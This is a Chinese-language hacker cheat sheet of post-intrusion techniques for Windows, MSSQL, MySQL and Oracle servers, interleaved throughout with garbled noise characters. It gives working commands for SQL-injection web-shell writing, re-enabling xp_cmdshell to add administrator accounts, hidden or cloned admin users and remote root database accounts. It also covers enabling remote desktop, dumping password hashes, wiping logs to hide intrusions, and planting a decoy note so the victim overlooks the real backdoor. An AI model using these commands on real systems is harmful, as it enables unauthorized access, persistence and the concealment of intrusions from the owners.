+ B4 ?" v: y! V
1.net user administrator /passwordreq:no
" ] v9 P4 [9 C3 l这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
) O) t5 g! k" Z, @3 j2.比较巧妙的建克隆号的步骤8 n6 c3 H2 F3 |0 R: L2 j3 |7 x
先建一个user的用户3 u! j7 w/ i& \0 \ `. O/ H W
然后导出注册表。然后在计算机管理里删掉/ p; _5 n. u+ _ A
在导入,在添加为管理员组) x, K, ?. f) d5 I
3.查radmin密码
( M2 q& v# U, ireg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
. D6 m( W, m+ i! R4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
" M, k1 R. k9 v5 ?, ]4 n建立一个"services.exe"的项
2 m% @. M* u8 T再在其下面建立(字符串值)5 [" L* F* H6 U" q
键值为mu ma的全路径
) m+ }& L: O7 ] T5.runas /user:guest cmd2 f. b7 ]7 u+ W% x$ P [$ L' X
测试用户权限!
K8 \% s/ b1 G% M# a6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
4 f; A; P& e; o L7.入侵后漏洞修补、痕迹清理,后门置放:
% v1 Q& h; h8 b8 q$ @+ H基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门( d, E. N6 j2 C: J+ Q+ g+ T# G
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c6 i. V: l: l9 T8 K3 d
6 R& p5 ]- }/ C5 v( F- [for example* N$ X& I/ q7 R( w/ m
- _+ E4 B* Y6 w& t0 t$ t
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
! c5 t3 y) u! O$ t# k3 B3 s) N$ Q' I
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
0 a3 j s3 w6 ~& B6 \) m/ V A* x' h0 ~2 Z6 R9 z
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了) M" e# a$ x4 m8 e$ x! S
如果要启用的话就必须把他加到高级用户模式! p1 w. S2 V1 H5 X- ]
可以直接在注入点那里直接注入9 b3 a) f! w$ x1 a; V1 o
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
: \( a) P3 c6 ~% y& m: W0 i! i( w' l6 J+ K# P然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
: i$ \: A4 R& S N8 v或者0 @+ q6 E9 s6 D; H2 B
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
7 m; b2 d, Z; q T来恢复cmdshell。
$ {( o/ e9 u/ G9 [! ~; O# j R' r0 V4 t! H" j
分析器) p) }1 j5 ?, F" I9 j
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
+ n# _: E( {9 ^" B9 Y) o然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")' K5 E! T# ^/ ~- k3 o& n0 a$ s
10.xp_cmdshell新的恢复办法% t* D$ Z1 z u
xp_cmdshell新的恢复办法
" p7 ~& X* h8 P8 U扩展储存过程被删除以后可以有很简单的办法恢复:
) I* f- B5 v) o7 f$ L9 z删除
' c7 R7 j( s$ p2 f) y- j" {; udrop procedure sp_addextendedproc
' h# [; N5 X( [- [drop procedure sp_oacreate
, Q+ l, C, A5 r6 A4 c4 n zexec sp_dropextendedproc 'xp_cmdshell'
# I7 R+ f6 h T+ w* d6 n
w8 r6 ], } c恢复: ]; k' ^2 {) J5 F2 a
dbcc addextendedproc ("sp_oacreate","odsole70.dll")4 B: w6 D4 k7 Q" I6 j7 J- j2 K+ }% p
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
: h D( A! z( r6 X" ^& Q/ s
- _/ F( `9 M! S# ]这样可以直接恢复,不用去管sp_addextendedproc是不是存在+ u* B8 f/ Y. k( _2 s' g' A5 Q
% d; I4 M# q; A9 }" ?; r! F5 {1 W-----------------------------
$ X# t# A; h" c9 ^2 w3 l
/ {- b' ?% V, J' V- g3 `8 y8 G# I/ J删除扩展存储过过程xp_cmdshell的语句:( U; A$ F1 ~+ y; _3 p; Q# q
exec sp_dropextendedproc 'xp_cmdshell': W2 n0 s/ V& [
6 Y' {7 [2 X1 Q$ F& B' p" S恢复cmdshell的sql语句! ]& O9 @: v" y3 \" s* Y7 T4 k
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'- Y: @6 ~( l! h8 N7 d- @/ L
/ `4 @0 R% y- R; l: K3 X- Y8 a6 A9 p/ ~; D q
开启cmdshell的sql语句
1 l. z& b0 K* ?8 C5 O/ @7 k
. O+ A5 z% ~/ R5 u& M# nexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
" n# \- j/ z8 k8 O! o" p+ p+ q3 b8 j! N o# D- Z1 H
判断存储扩展是否存在9 t! @$ ^ |. ]& B, W& J O
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
8 E' T9 T: F/ U, N l返回结果为1就ok
/ s6 V' n# x2 L% E! i8 {
; b7 e! }& o, ]$ [' ]" ]恢复xp_cmdshell: \- s1 J/ D& v! g* d3 r
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'$ V/ a1 a" H+ m' R2 p! N) G
返回结果为1就ok3 o7 K( b7 } I: Y: W0 W
) N( x' E% X% I# Q2 j( J否则上传xplog7.0.dll$ _. |4 M0 ^8 I+ T+ i$ a
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
- m. i6 L& F4 D9 d; ^
) O H" y! O% X2 S3 }堵上cmdshell的sql语句7 C$ K, q0 O0 N0 ~ ]. x7 Z6 \3 J# h
sp_dropextendedproc "xp_cmdshel
) D9 G- e8 e& {& O# n4 D-------------------------$ { M" Q( T2 n2 I
清除3389的登录记录用一条系统自带的命令:
9 y' R. n6 y! Y8 F+ xreg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
* F$ B! c+ ^% J2 O: C
( x! V. j6 J. o# z! P9 _然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
; j+ J' G! H" {$ D0 q在 mysql里查看当前用户的权限# R( M$ `1 k1 P% ^/ R
show grants for 9 O4 h; Y: I+ g3 P' P
7 b5 \, i4 F) \8 X+ T5 ]/ A1 H2 M3 V
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。* ]/ N& V2 b& \- v* m( g
; Z- k! B, A2 s. b4 r
$ r6 ?( {8 |8 l0 R7 U8 u1 U
Create USER 'itpro'@'%' IDENTIFIED BY '123';
% l: F& ^6 m5 A: H/ [8 r' ~2 o& R6 q. T8 j8 @$ {7 S7 L/ K
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
& X8 u( V, M1 M1 e/ R) }/ e) ~' M
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0) G- c' |, p5 g- d% D
9 j6 h8 ^ B1 b0 SMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;( O8 Y5 a$ K$ r: R9 N
1 I1 g( n, R1 T& l9 {# t: C' P- ?
搞完事记得删除脚印哟。
9 o. }4 J( n3 N" L: `# Z. O& T% i9 ~2 z; {- {) @7 |- Z1 A1 t- f
Drop USER 'itpro'@'%';' O& v1 J* T# Y/ f2 w3 p* C
- |1 c4 C, q: B8 {# N: U5 Y% cDrop DATABASE IF EXISTS `itpro` ;
/ r6 h9 d" `/ q/ r# K$ v3 H3 I3 Q3 }, g9 r0 f2 K
当前用户获取system权限& c" \- N# T) @& e# _
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
+ i+ `, n4 Y; n F, ?sc start SuperCMD5 I4 B8 @# }0 v3 u/ X
程序代码3 b( F# ^# e: X& |
<SCRIPT LANGUAGE="VBScript">1 o- m5 T3 ]# Y, p4 k$ ]1 ?
set wsnetwork=CreateObject("WSCRIPT.NETWORK")# b8 H( _1 C, h% w, G B, d/ L4 t
os="WinNT://"&wsnetwork.ComputerName
; P3 k; l8 |) H2 y) ySet ob=GetObject(os)
" Y7 f% L: h$ o v, P" _ B X( [Set oe=GetObject(os&"/Administrators,group")+ b' P1 v: q1 q I2 D, t+ h
Set od=ob.Create("user","nosec")' m& J$ f/ O( v
od.SetPassword "123456abc!@#"
/ W; o9 X" M( J, bod.SetInfo0 j& t5 f$ n' G2 f
Set of=GetObject(os&"/nosec",user)
) F9 V% q; Q8 ]# z! `/ V+ l Qoe.add os&"/nosec"" @( ]0 R# A! z: J+ V: s
</Script>
4 _ `% T& G0 z" i+ N<script language=javascript>window.close();</script>! e( T' z; d2 Z+ R! R
& ~; y% W5 D+ I& p& c7 B1 ^
% g1 d/ @" K; D1 A4 ^
9 ? {/ Z% M, M5 E: o; V# X3 w+ k+ e2 z8 [) o8 X
突破验证码限制入后台拿shell m8 m+ {0 H" W3 ^
程序代码
+ E+ ]% y' `" ]6 {REGEDIT4
$ I( F( x1 o$ f( ^4 o. b7 [[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] 3 Z! K3 `/ \6 g( @. r0 `* l
"BlockXBM"=dword:00000000
3 K. ~& |, J" |) P' _+ i' p$ J" I! ^* [6 s; ~- w; V' H
保存为code.reg,导入注册表,重器IE
( D7 f- H' ]# m就可以了, D1 r* e/ k" ^+ }6 Q7 F0 @
union写马
- E- t2 D1 b: L. |7 w4 h" m4 x程序代码
7 p m, n5 P( }) m3 p. `4 uwww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
; x/ l- n3 Q, C8 D0 L1 }3 E: T3 m; a/ b2 h
应用在dedecms注射漏洞上,无后台写马
% T v# _" r% s' pdedecms后台,无文件管理器,没有outfile权限的时候: H% C. ~0 z: A9 A
在插件管理-病毒扫描里9 S: |/ g i3 r2 O6 d& O
写一句话进include/config_hand.php里
* `# Q$ ?' t+ ~5 [: q程序代码0 V+ T, m2 p9 W8 h/ a7 W4 O8 R2 Q1 N
>';?><?php @eval($_POST[cmd]);?>- N) y% B3 E8 c, T
* Q! s( }& z: `/ [/ \- E
4 m- d4 z# L/ I0 U" U如上格式
. j' c& `4 Z& v4 N. }- L t; h
4 T7 f( r3 |# d$ roracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
9 n' F; [, U7 t9 g1 O* O程序代码* y$ O+ I3 U- Q
select username,password from dba_users;# T4 B3 |" b0 N4 ?; F- g: y0 s( X
! g! W5 `0 Q3 z6 b' I3 U. u
4 U6 D# v% n1 l" H; |* j- q/ L7 o
mysql远程连接用户: F4 Z c4 t0 ?8 P* |3 I+ m' A
程序代码
Z- q, u/ \$ m% }7 {+ f: `# a
2 x0 S9 M# b0 G7 b9 ~4 d" `$ tCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';, H, d" P, a Q4 M; J
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
# ?& p# P* C7 V# k6 y$ m( ZMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
: {! ]2 t2 x+ m$ H6 \- LMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;" z) m' H% d- N; y2 x
% V8 x3 q0 N, g! ~* d! I) Y6 }2 I+ N4 j* b! n
7 w" }' A! d/ i, O& y! x6 p0 ^0 R6 E: ~8 y% P" r
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
2 Y" w2 {5 s @
' |# T$ ]* ^+ I, \. ^( L: @* S2 w* o1.查询终端端口
. p3 I! X& g$ d. p: g0 ? G. a' M3 J: q8 A+ b8 X
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
6 c6 e V; B0 b4 O, }
2 G0 { N$ s, w# C- ~. y: E. }通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
) t# }/ \ H. M# k- S7 ], O: etype tsp.reg$ e4 W% Q! x6 ~/ z, `% G2 T
. Q6 U0 V. ]/ v4 K! w* Y# m, A
2.开启XP&2003终端服务
" p' Z. h. O0 Z4 g( b' ]. C4 O5 F, V f% }. a
8 X$ W) y; U' i! O* l# W: oREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f* S* w; p4 ~% R1 C1 D" s, J
- C! d& `% S! R/ P, D- e
6 p- C( i: x* q. g3 UREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f" h0 y& I; ?" ?% m5 K8 S
7 {* e8 i# H, \, Z. G8 u9 \
3.更改终端端口为20008(0x4E28)/ S0 ? O# X+ _0 d- I
h8 S5 e! D+ B) `REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f- Y# C3 {. n4 ~. x
/ X& z6 b# X7 `
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
9 T; W, j' s" Y2 y- M9 y$ o: D0 r
) v2 I! m& m* Y1 Z# @+ R, N9 E4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制* H" N; [; l/ [( W" B5 s6 T& {; m- e. f
6 [1 ]$ I* H% K8 S
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
2 J3 n/ A$ Y7 y! N6 E/ G
, Z5 M( c2 A8 B4 ~! b, S- d+ b O, |' f- g2 t: i4 A0 W6 w+ }
5.开启Win2000的终端,端口为3389(需重启)5 _9 d: `- \3 i( q
1 b4 E- [8 ]! u* A! }; s4 m
echo Windows Registry Editor Version 5.00 >2000.reg ; \* D$ V5 [* v( z' a/ G
echo. >>2000.reg
$ z8 S! b# N" M$ b( j) @4 I% }echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
: R4 e: |8 q4 c2 W. K1 Jecho "Enabled"="0" >>2000.reg 5 k. G8 K1 ?' l3 Q: r% g* m
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg " D) L& w' B$ G+ d5 ]
echo "ShutdownWithoutLogon"="0" >>2000.reg 8 W5 a2 W$ l/ [5 ^$ h( y" E
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
7 `$ v/ x& \& c: F+ Q3 K1 ]echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
1 _. f v& ?1 r3 `1 \% [echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
/ D$ t6 a4 L' O7 v3 p) Decho "TSEnabled"=dword:00000001 >>2000.reg
6 b1 ?& J% S) u7 e) a Eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg ; s% o M) }, M( Q3 Q+ f6 X* S
echo "Start"=dword:00000002 >>2000.reg
0 N$ L2 G& h6 ~% Z% `% N! J' x: Necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg + `, {4 Z) F8 X6 s: o5 w
echo "Start"=dword:00000002 >>2000.reg ) A, _0 h& l3 ]& D3 |3 E& A) Q
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg 3 \8 z8 c8 Z- Y, A4 Q
echo "Hotkey"="1" >>2000.reg
* Z! p* a3 [) n+ R% F# Fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
# q- P! _( j6 ?5 F! eecho "ortNumber"=dword:00000D3D >>2000.reg
" F N" V) d# ~8 mecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg . w5 Y2 E) u6 \
echo "ortNumber"=dword:00000D3D >>2000.reg8 N0 i! g" j- C
. p& V* v4 R9 c# S
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)7 V8 d' m6 O: y! w4 H% j. U
$ P9 f- w- F$ n, x
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf( n9 `5 O& J6 Q9 {( Z0 P5 ?
(set inf=InstallHinfSection DefaultInstall)
# l! j" T) ^. T8 Q; i/ aecho signature=$chicago$ >> restart.inf
8 @% } d' [) N* t/ recho [defaultinstall] >> restart.inf! g; O& h2 I+ r: b1 W
rundll32 setupapi,%inf% 1 %temp%\restart.inf% u' X8 }3 f' q4 M. d9 h$ }
: Y4 b9 b$ K* ]* I
7 t E; g8 h. m6 \8 |
7.禁用TCP/IP端口筛选 (需重启)
& _ q/ k) x0 y) V, c" x" k# n
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f* c9 R. }3 y7 ]" W0 j4 t! ~
; |1 E. H: b6 O8 ]- q
8.终端超出最大连接数时可用下面的命令来连接
2 \& K& \; m3 x0 I# q: Q( Z
, w/ {4 ?* l5 m; f% n( o L# q; [mstsc /v:ip:3389 /console
$ \7 a3 X. t2 \, A. I" f+ o! @9 a" D
9.调整NTFS分区权限
5 @4 K0 Y) ?. M& c9 l+ q3 f) k; X) Z1 T
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)2 t% f; S+ s" H' w
8 C* W) P( Q- X+ m; O8 C3 p# q
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
# c: E) k- N" s: [8 `( L3 o
5 h7 o# {5 P& P- d------------------------------------------------------' }/ u+ C! V$ |1 C1 V
3389.vbs " H+ Q7 T+ I: i S2 T
On Error Resume Next
9 u; Y" z# z5 h* K: R0 t; ?+ S2 uconst HKEY_LOCAL_MACHINE = &H80000002& }1 E O. q @% G
strComputer = "."
" t0 O1 K( x( s7 ~/ ]3 M3 B1 _/ H+ o3 OSet StdOut = WScript.StdOut! X9 t* r# L6 y/ b+ K# w& Y; q
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
) T. x. ~- Y( Y) n) D% X% NstrComputer & "\root\default:StdRegProv")7 O! v% q( t7 E- e% \
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
) v* }# L' o+ I" G5 _oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath8 c3 F4 p/ f! C
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"! z4 n+ `) `& S6 m
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath( q6 r I; P2 j+ `' A3 l
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"/ U0 P# V* T3 T n* J! b* c' k5 }
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"+ V: Y' W% s/ A1 k0 c# P
strValueName = "fDenyTSConnections"
( _$ I% G1 N" Q# udwValue = 0- o) h) b+ U3 k' d8 P8 X9 m
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
: V# D; S. m1 m* H% e: ostrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
7 f, h9 ^! E0 A+ O% |# p4 @strValueName = "ortNumber"
8 C% `( P3 _1 e9 xdwValue = 3389
- ?; z O0 D+ ?2 P5 loreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue+ z7 l# d' {3 g3 }) G
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"8 \. E3 k5 g/ o2 ~5 A1 U
strValueName = "ortNumber"
) e! F& ]/ ?( W+ O) ndwValue = 3389
0 b. N2 E( Y h/ Loreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
- }# }1 |& h$ b; W$ jSet R = CreateObject("WScript.Shell") 1 v5 g3 v m/ Q# N+ d! z: E/ v: L8 t
R.run("Shutdown.exe -f -r -t 0")
1 k% C/ g& @/ |& s+ \0 n7 W ^9 l, N# r; U4 c
删除awgina.dll的注册表键值
6 j6 K0 m+ b r" m6 h* z) J0 s程序代码
" Q- d9 C3 B% @. l( {
3 m8 V2 C# b- D7 x3 `+ n* a4 zreg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
* M( H J/ e/ M/ K& W% G( h3 }. g
9 s9 I$ v3 R9 R
5 O8 j! N1 R0 E" [9 \5 w
- g4 y1 b# c6 q! c6 N
程序代码0 O# H/ E( @; d5 j1 I* N l! D- X2 a
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
4 l4 d6 d- v- h% ^
1 n; m' P! y. Z! z+ E1 s) Z' \$ \( U设置为1,关闭LM Hash a: F: d0 |% f
. f- t' K$ Z( O* C数据库安全:入侵Oracle数据库常用操作命令6 q6 e3 Z, z* W! ]$ p$ k
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。3 u. |+ {4 C% f9 l R" }5 p6 P7 _
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
0 g7 N( a$ j' ? ^& w" C% j1 r2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
' K! e9 ^- v( [2 i6 e3、SQL>connect / as sysdba ;(as sysoper)或; D) K' u# s H1 _1 k
connect internal/oracle AS SYSDBA ;(scott/tiger)
" I, A: i4 N+ nconn sys/change_on_install as sysdba;4 t3 _% c; }# v/ z
4、SQL>startup; 启动数据库实例
, w' e/ X' @7 |# q4 P* Y5、查看当前的所有数据库: select * from v$database;
! f+ I/ w# O2 n; Cselect name from v$database;
' z2 O/ G: x" J6 q* Q$ S- m6、desc v$databases; 查看数据库结构字段 ]' H+ w) _. {+ }4 q
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:1 _# M. m/ Y! c1 i
SQL>select * from V_$PWFILE_USERS;% y0 y# i5 Y$ B* B& U: c8 y- R
Show user;查看当前数据库连接用户 ^$ {+ K# I; g5 s7 R7 g
8、进入test数据库:database test;
( U' H$ @* q% \' C6 W7 P; D; U) g! D9、查看所有的数据库实例:select * from v$instance;' K7 e7 D' \( p& o
如:ora9i
; _0 k! v5 r: D7 S' }/ K10、查看当前库的所有数据表:) h7 Z+ ^, w2 w) f: Y
SQL> select TABLE_NAME from all_tables;" w7 S9 d2 ?( D7 m+ W; e' T
select * from all_tables;
5 a0 }. w# o$ x! ?" fSQL> select table_name from all_tables where table_name like '%u%';
% q: v# ]' N4 PTABLE_NAME
/ S4 P$ M+ T. Y( _------------------------------, N) C; e- n" M% Y. m
_default_auditing_options_4 z4 f" P3 V, U0 v1 [
11、查看表结构:desc all_tables;
: A2 A: a6 y; H12、显示CQI.T_BBS_XUSER的所有字段结构:. C4 w0 D/ |6 y' J; e( L- ]
desc CQI.T_BBS_XUSER;
) X. D9 B% R3 t1 g" [: O13、获得CQI.T_BBS_XUSER表中的记录:
" E: H" L5 `( ~! ^! M% k7 ~* h9 T0 Cselect * from CQI.T_BBS_XUSER;* C. n' Y: y; W( \+ ?# J! z
14、增加数据库用户:(test11/test)) Q7 C. S" B, v+ g8 L' O
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;+ F: c& p+ ?+ ~8 [$ ]& \
15、用户授权:" M3 s0 R$ G1 @4 B1 S7 t
grant connect,resource,dba to test11;1 f% |; q! I2 {
grant sysdba to test11;
7 A; w* Q0 Z* L( I4 C% K, \* ?commit;/ b4 Q0 r( N8 E# n. v
16、更改数据库用户的密码:(将sys与system的密码改为test.)0 n8 t0 }' _0 X6 ]$ h7 b+ ?, `
alter user sys indentified by test;
! l6 p- O% t, ]alter user system indentified by test; v% r5 _' j0 ^( f
0 d9 U& c1 B$ OapplicationContext-util.xml( z5 e4 j I* j& ^4 y6 U/ }+ D, J
applicationContext.xml
' K) P) i( A# d4 wstruts-config.xml
. Y& f3 F2 A+ k: Rweb.xml) a6 Y' X8 B& l; {2 j' B0 Q
server.xml7 b7 i/ |) q4 R7 B$ \/ \
tomcat-users.xml
& l) _5 D! k: c5 O2 P: {: Dhibernate.cfg.xml- B4 [$ ?" |' l
database_pool_config.xml& r& K3 s) b" N& j2 I2 n
' \+ q O% L- ?3 n7 `9 {8 i: Y' p! E- F, N
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置: J4 D( I/ O4 M) A0 j1 q
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
. o. A- P* U$ ^ {\WEB-INF\struts-config.xml 文件目录结构- o$ E( \( c! {( F' `6 m
- q6 p8 S5 a# f
spring.properties 里边包含hibernate.cfg.xml的名称7 A/ U- q0 }& { q; }8 y B2 n7 b4 _
y7 ~+ b; F( M$ C5 W
+ U- G8 K; z" m5 _' _1 R
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml% j9 K) p: ~& H
2 I- A* Z. t5 V! a. a9 s如果都找不到 那就看看class文件吧。。
5 {- h# H- Z+ g; y. p8 K3 H+ C9 i9 \; l& V
测试1:
( U+ N5 ]! y' T/ }$ CSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
! r) f8 c2 _ p# ~3 _7 w: a- D2 t- ]
测试2:
5 p$ g: ?5 t& \0 m. I; [5 A5 r, x8 l5 q7 @
create table dirs(paths varchar(100),paths1 varchar(100), id int)
: e7 F7 h8 _3 v# I9 a% G( E$ q6 z
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
, T$ P5 O4 }4 V) P4 v7 G) K3 R8 {# `! m, a
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t16 l! _$ ?8 F7 e) D: y6 \
1 p/ O, H- ~! \% r* M; H0 a* u
查看虚拟机中的共享文件:
& {: L' x# m. M0 a1 n) F在虚拟机中的cmd中执行5 a2 u& f4 `* S+ s
\\.host\Shared Folders8 ~ F* G c$ H% M3 r% s _
6 ]. }7 w# P1 {+ i
cmdshell下找终端的技巧
1 y9 i! O2 E7 f找终端:
7 x! ^- }2 z) e, R4 q( f* {第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
* B( ? |( h$ X! ] T 而终端所对应的服务名为:TermService
- @& N# K7 {, Y7 ? U6 H第二步:用netstat -ano命令,列出所有端口对应的PID值!
9 V4 T4 y n" x& g: \ 找到PID值所对应的端口2 e8 k/ a T3 j0 U/ ~+ t
! d! ^4 v: C, o/ t7 p( B. F P5 K查询sql server 2005中的密码hash0 ?$ q( a* w: A* y
SELECT password_hash FROM sys.sql_logins where name='sa'
) ]/ `" Z6 k) z7 jSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a0 K, B: X6 t, J1 a" G @ v& G
access中导出shell
' `) I# w! E; d4 z7 r0 Y" o4 j: Z6 [( [8 u8 _, S5 I: e. f$ A
中文版本操作系统中针对mysql添加用户完整代码:0 b6 t" _. j0 |7 }5 z' C2 D3 g
# Q) h9 C/ V' Q& t7 H6 u: ]use test;, ~& k+ _( l2 a8 \
